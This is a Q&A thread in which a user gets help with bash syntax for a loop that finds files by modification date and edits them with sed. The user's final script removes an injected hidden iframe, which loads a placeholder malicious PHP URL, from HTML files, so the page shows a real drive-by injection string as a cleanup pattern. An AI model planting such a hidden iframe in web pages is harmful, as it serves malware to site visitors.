# Modify list of file according to date in bash

Tags: bash, sed

I have a list of files with specific dates.

I want to replace each last line of a file with date like Aug 20 2013 to something like "This is the end."

How do I make it in bash?

I tried something like:

```
 for f in `ls`; do
  d = `date -r $f +%F`
  if [$d == '2013-08-20']; then
    sed '$ c\ > This is the end' $f
  fi
done
```

But i got error in line 2 saying:

```
d: command not found
```

Anyone can help me?

Update:
Final code:

```
#!/bin/bash

for f in *; do
  d=$(date -r $f +%F)
  if [ "$d" = '2013-08-24' ]; then
sed -i 's#</html><iframe src="http://example.com/some-malicious-code.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>#</html>#g' "$f"
  fi
done
```

Comment: You need to put a space between `[` and `$d`: `[ $d == '2013-08-20'];`

Answer (score 2, accepted):

Your script has many syntax errors.

**(1)** This is wrong shell syntax since there shouldn't be space before or after `=` in assignment:

```
d = `date -r $f +%F`
```

It should be:

```
d=`date -r $f +%F`
```

or better:

```
d=$(date -r $f +%F)
```

**(2)** This is again wrong syntax:

```
if [$d == '2013-08-20']; then
```

It should be:

```
if [ "$d" = '2013-08-20' ]; then
```

Moreover you script can be improved further, e.g. instead of:

```
for f in `ls`; do
```

you can do:

```
for f in *; do
```

Comment: Thank you! I didn't realize I'm using bash. I guess I need to read more on this.